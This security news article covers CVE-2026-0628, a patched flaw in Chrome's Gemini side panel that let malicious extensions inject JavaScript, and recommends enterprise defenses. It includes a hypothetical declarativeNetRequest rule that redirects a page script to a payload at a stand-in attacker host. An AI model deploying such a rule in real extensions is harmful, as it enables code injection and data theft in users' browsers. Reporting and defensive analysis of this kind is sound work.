Google has resolved a high-severity vulnerability in its implementation of Gemini AI within the Chrome browser. Prior to the fix, the flaw could have allowed threat actors to escalate privileges, access private user data, and interact with sensitive system resources. Security researchers note that the finding illustrates the evolving risk models associated with agentic browsers that feature native AI integration.
Tracked as CVE-2026-0628, the vulnerability could have enabled malicious browser extensions holding only basic permissions to escalate privileges, granting unauthorized access to an affected user's camera and microphone and to local files and directories, along with the ability to capture screenshots of active websites. Researchers from Palo Alto Networks' Unit 42 discovered and reported the issue.
"The vulnerability put any user of the new Gemini feature in Chrome at risk of system compromise if they had installed a malicious extension," Gal Weizman, senior principal researcher at Palo Alto Networks, stated in the disclosure. "Beyond individual users, the risk profile was significantly amplified within business and organizational environments."
The Gemini Live feature in Chrome operates within a privileged side panel. This placement grants the AI elevated capabilities to interact with local system resources and access on-screen content to complete complex tasks. Many modern browsers now integrate agentic AI capabilities to process data and execute multistep operations that previously required manual user intervention.
While these expanded capabilities improve usability, they also widen the attack surface for both home and corporate users. "This creates security implications that are not present in traditional browsers," Weizman noted.
Technical mechanism and resolution
Unit 42 researchers identified the vulnerability through an interaction with the declarativeNetRequest API, which failed to maintain a proper security boundary. This failure "allowed permissions that could have enabled an attacker to inject JavaScript code into the new Gemini panel," Weizman documented in the report.
The declarativeNetRequest API serves legitimate purposes, such as enabling content blockers to stop requests that lead to privacy-invasive advertisements. Under normal circumstances, when its rules apply to pages loaded in a typical browser tab, the design functions safely.
The security issue emerged specifically from how Gemini AI integrated with the browser component. The flaw allowed code injection to execute when the application loaded within the highly privileged Gemini side panel, where "Chrome hooks it with access to powerful capabilities," according to Weizman. Because the Gemini application requires access to local files, screenshots, and audio-visual hardware to perform its tasks, gaining unauthorized control over this specific panel granted those same capabilities to the injected code.
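Declarative net request rules illustrate how the same mechanism can serve both roles. The sketch below is hypothetical — the disclosure does not publish Unit 42's actual rules or exploit chain — but it shows the general shape of a benign blocking rule alongside a redirect rule of the kind an attacker could abuse to swap a script fetched by a privileged page for attacker-controlled code. All URLs and domains are placeholders.

```typescript
// Hypothetical declarativeNetRequest rules, for illustration only.
// Rule shape follows the chrome.declarativeNetRequest API:
// { id, priority, action, condition }.

// A legitimate content-blocker rule: block requests to an ad server.
const blockAdsRule = {
  id: 1,
  priority: 1,
  action: { type: "block" },
  condition: {
    urlFilter: "||ads.example.com^",          // placeholder ad domain
    resourceTypes: ["script", "image"],
  },
};

// A redirect rule of the general shape an attacker could abuse:
// a script requested by a page is silently replaced with a
// payload from an attacker-controlled server (placeholder URLs).
// Loaded into a privileged context, the payload inherits that
// context's capabilities.
const redirectScriptRule = {
  id: 2,
  priority: 1,
  action: {
    type: "redirect",
    redirect: { url: "https://attacker.example/payload.js" },
  },
  condition: {
    urlFilter: "||cdn.example/app.js",        // placeholder target script
    resourceTypes: ["script"],
  },
};
```

The danger is not the redirect primitive itself — content blockers and privacy tools use it routinely — but where the rewritten response ends up executing.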
Unit 42 demonstrated the vulnerability to Google in October. Google reproduced the issue and deployed a patch in early January to secure the boundary.
Securing agentic AI browser architectures
As AI integrations become standard, the proactive nature of agentic technology requires a shift in traditional browser security models. Unlike standard browsers that primarily display content, AI agents actively evaluate and act upon the data they process.
"These agents can inherit a user's authenticated browser session and perform privileged actions inside enterprise applications, including modifying data or triggering workflows," says Anupam Upadhyaya, senior vice president of product management for Palo Alto Networks' Prisma SASE.
Securing these environments requires developers to build native, continuous, and policy-enforced security directly into the browser architecture. Upadhyaya recommends that design teams integrate real-time inspection of user prompts, AI responses, and rendered content at the exact point where users, data, and AI interact.
For enterprise security teams, adapting to this new architecture means recognizing that traditional network and endpoint controls were not designed to monitor native AI browser interactions. Organizations can strengthen their defenses by treating the browser as both a primary security perimeter and a control plane.
Practical steps for organizations include:
Gaining visibility into which AI browsers and extensions are currently active within the environment.
Implementing in-browser monitoring for user navigation, data uploads, copy/paste activity, and extension behavior.
Enforcing policy controls in real time before sensitive data leaves the browser environment.
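For the first and third steps, managed Chrome deployments can start with Chrome's built-in enterprise policies before layering on dedicated tooling. The fragment below is an illustrative sketch, expressed here as a typed object (in practice such policies are distributed as JSON or via group policy): it blocks installation of all extensions by default and allows only an explicitly vetted set. ExtensionInstallBlocklist and ExtensionInstallAllowlist are real Chrome policy names; the extension ID shown is a dummy placeholder, not a recommendation.

```typescript
// Illustrative Chrome enterprise policy fragment (placeholder values).
// Deny-by-default extension posture: block everything, then allow
// only extensions that have passed internal review.
const managedChromePolicy = {
  // "*" blocks installation of every extension by default.
  ExtensionInstallBlocklist: ["*"],
  // Allow only explicitly vetted extensions by their 32-character ID.
  // The ID below is a dummy placeholder.
  ExtensionInstallAllowlist: ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"],
};
```

A deny-by-default posture like this directly narrows the attack path described above, since a malicious extension that is never installed cannot abuse any API boundary.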